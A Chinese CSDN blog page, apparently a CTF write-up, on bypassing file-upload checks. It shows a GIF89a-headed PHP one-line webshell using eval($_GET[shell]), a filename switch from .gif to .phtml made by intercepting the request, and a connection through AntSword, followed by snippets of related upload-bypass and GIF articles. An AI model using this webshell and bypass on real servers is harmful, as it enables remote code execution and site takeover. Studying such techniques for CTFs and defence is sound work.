GIF89a

最新推荐文章于 2023-07-02 00:26:11 发布
最新推荐文章于 2023-07-02 00:26:11 发布
阅读量2k 收藏 5
点赞数 3
文章标签: php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_59392781/article/details/120316504
版权
本文探讨了如何利用PHP脚本和GIF89a头信息欺骗进行代码注入。通过将恶意PHP代码嵌入到HTML中,并利用.phtml或.gif文件格式混淆,攻击者能够绕过服务器的安全检查,实现木马上传和执行。蚁剑在这种场景下常被用于远程控制。了解这种攻击手段对于提升网络安全意识和防护能力至关重要。
摘要由CSDN通过智能技术生成 
GIF89a
<script language="php">eval($_GET[shell])</script>

通常,在嵌入了php脚本的html中,使用 phtml作为后缀名;完全是php写的,则使用php作为后缀名。这两种文件,web服务器都会用php解释器进行解析。

当不能使用php代码直接注入时可以改为phtml格式加入GIF89a(图片头文件欺骗),后台认为是图片,上传后再执行木马。

先将文件改为.gif欺骗网址第一层,抓包将filename改为以.phtml结尾并以这种方式进行,GIF89a则负责骗过第二层。

请添加图片描述

通过蚁剑一般连接的是:url/upload/文件名
此题为:请添加图片描述
蚁剑连接即可

石星
关注
【愚公系列】2023年04月 文件上传渗透测试之绕过白名单检查(文件GIF89a
时光隧道
08-22 5万+
文件上传漏洞是一种安全漏洞,指攻击者通过网站上传功能上传恶意文件来攻击网站的漏洞。攻击者可以通过利用这种漏洞上传恶意文件来执行代码和命令,进而控制网站、窃取敏感信息等。常见的文件上传漏洞主要存在于没有健全的文件上传验证机制的网站中。白名单检查是一种安全机制,用于限制只有列入特定名单中的人员、设备或程序才可以获得访问权限,而不允许其他未经授权的访问。这种机制通常用于保护敏感数据或系统不被未经授权的访问和攻击。在白名单检查中,只有列入白名单的实体允许通过验证,而不在白名单中的所有实体都被阻止访问相关资源。
(转)GIF89a图片文件欺骗
往回的博客
01-15 2205
1、什么是GIF89a     一个GIF89a图形文件就是一个根据图形交换格式GIF89a版(1989年7 月发行)进行格式化之后的图形。在GIF89a之前还有87a版(1987年5月发行),但在Web上所见到的大多数图形都是以89a版的格式创建的。 89a版的一个最主要的优势就是可以创建动态图像,例如创建一个旋转的图标、用一只手挥动的旗帜或是变大的字母。特别值得注意的是,一个动态GI...
Web-文件上传漏洞总结
最新发布
Welcome To Myon'Blog !
07-02 869
1、常规前端绕过 2、修改文件类型 3、使用 .user.ini 或 .htaccess(可能还存在大小写绕过) 4、使用字典爆破可行后缀 5、结合文件包含漏洞使用图片马 6、条件竞争
GIF 89a图像格式解析
QQ135102692的博客
05-17 7217
89a是针对87a的升级版本,相比于后者增加了一些额外的控制块更加精确的控制GIF播放。现在常见的GIF图都是89a,下面将使用一张10x10的gif来理解GIF的图像格式
GIF89a文件欺骗
xiakaiphp的博客
01-06 4555
下图一个典型的GIF89a图片欺诈文件 通过 getimagesize 方法检测图片的有效性
GIF89a图片欺骗攻击
weixin_50464560的博客
08-06 2932
进入到linux的tmp目录里一看,很吃惊,一堆php文件,如下图: 不知道是哪里来的,而且已经很久了。查看内容基本都是这样的: [root@kermit tmp]# cat phpzpqXzeGIF89a<%response.Write(987651234-123498765)strURL = Request.Servervariables(“url”)intPos = InstrRev(strURL,”/”)intStrLen = len(strURL)strFileName = Righ
GIF动画全操作支持库1.3版(GIF89a.fne)-易语言
06-13
"GIF动画全操作支持库1.3版(GIF89a.fne)" 是一个专为易语言(Easy Language)设计的库,旨在帮助开发者在Windows平台上创建和处理GIF动画。这个库不仅能够解析GIF文件,还能合成新的GIF动画,为开发者提供了全面的...
易语言-GIF动画全操作支持库 (1.3#0版)(GIF89a.fne)
06-28
对于GIF89a.fne这个特定的支持库,它的主要功能包括: 1. **库定义数据类型**:库定义了4种专门的数据类型,这些类型可能包括GIF图像结构、帧信息、颜色表等,用于存储和处理GIF动画的相关数据。理解这些数据类型...
gifencoder:实现GIF89a规范的纯Java库。 适用于Android
04-22
GIF图像限制为256色。 如果您提供颜色更多的图像,则gifencoder的默认行为是使用进行。 您可以通过ImageOptions配置此行为。 提供了一些量化器和抖动器,但是您也可以插入自己的实现。 基本用法 int [][] ...
PHPResizeGif:符合GIF89aGif尺寸调整器,包括透明度和具有小尺寸元素的优化gif
05-16
该软件包旨在对包含GIF89a规范的gif文件进行适当的大小调整。 介绍 大多数(如果不是全部)其他所有公开可用的gif调整大小包都无法通过优化的gif文件失败,那些仅在后续帧中更新文件一部分的文件。 将这些视作背景...
直接显示GIF图片的C++类(GIF87a,GIF89a,JPEG, BMP, WMF, ICO, CUR)
03-17
Picture displaying control with support for the following formats: GIF (including animated GIF87a and GIF89a), JPEG, BMP, WMF, ICO, CUR
GIF89a图片文件欺骗
热门推荐
piaolankeke
09-09 3万+
<br />1、什么是GIF89a<br />    一个GIF89a图形文件就是一个根据图形交换格式GIF89a版(1989年7 月发行)进行格式化之后的图形。在GIF89a之前还有87a版(1987年5月发行),但在Web上所见到的大多数图形都是以89a版的格式创建的。 89a版的一个最主要的优势就是可以创建动态图像,例如创建一个旋转的图标、用一只手挥动的旗帜或是变大的字母。特别值得注意的是,一个动态GIF是一个 以GIF89a格式存储的文件,在一个这样的文件里包含的是一组以指定顺序呈现的图片
GIF图像格式简介(87a和89a)(C语言生成GIF图像)
梦的灰色边沿...
02-27 9354
1 GIF图简介   GIF(Graphics Interchange Format)图像格式是Compuserve与1987年开发的一种图像文件格式。该图像本身可以存储静态图和动态图,但如今该图像主要被用来存储动态图,且在大部分系统上都支持。但是相对于webp这些新式的动态图格式,其在颜色质量和压缩率上的表现相对不如人意。   该图像表达图像和一般的图像直接存储图像内容不同,而是通过一个颜色表映射来表达对应的图像的内容。也就是说图像中存在一张颜色表存储图像中出现的颜色,然后每一帧的图像通过颜色索引来表示颜
GIF89a结合动网后台(7.1以前)取得webshell的完整解释
蓝法典的专栏
04-11 3163
文章编辑:NetHacking 来源:http://www.powers.com.cn 作者:喜欢忧伤背景:(1)动网上传文件,备份得到后门(2)使用GIF89a可以上传内容为木马的gif图片:逃过像上传的检测。所以产生了新的方法:上传gif图片,备份得到木马了。(使用范围为:动网7.1以前的版本)但是很多人在执行后门后出现的是一张不能显示的图片.偶还是公布一下我用了恩久的更方便的方法,同时
关于前端对gif图的使用
vileman的博客
04-14 3392
1.如果gif是播放一次的怎么去重复播放 原理: 播放完之后gif图存在缓存内的数据改变,你再一次获取的就是gif上一次播放的最后 解决方案: 1.1.在gif的地址后面加上时间戳(原理:去除缓存,每次都去请求获取gif图)(不推荐) 缺点:耗时耗性能 1.2.请求gif图之后,将gif图的数据转为bl...
php伪装图片,GIF 图片伪装技术
weixin_29847829的博客
03-10 882
GIF89a图形文件是根据图形交换格式(GIF)89a版(1989年7 月发行)进行格式化之后的图形。在GIF89a之前还有87a版(1987年5月发行),但在Web上所见到的大多数图形都是以89a版的格式创建的。89a版的一个最主要的优势就是可以创建动态图像,例如创建一个旋转的图标、用一只手挥动的旗帜或是变大的字母。特别值得注意的是,一个动态GIF是一个 以GIF89a格式存储的文件,在一个这样...
生命在于学习——反序列化
易水哲的博客
09-02 253
反序列化的一些笔记。
文件上传-文件绕过getimagesize()
T1ngSh0w的博客
09-21 3132
文件上传漏洞之绕过getimagesize()函数的检验
matlab遇到该问题如何解决:错误使用 matlab.internal.imagesci.wgifc 只能追加 GIF89a 格式GIF
06-07
您可以尝试使用其他格式GIF文件,或者使用其他软件将您的GIF文件转换为GIF89a格式。您还可以尝试使用以下方法解决该问题: 1. 确认您的MATLAB版本是否支持GIF格式。 2. 尝试使用其他GIF读取函数,例如imread。 3....
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值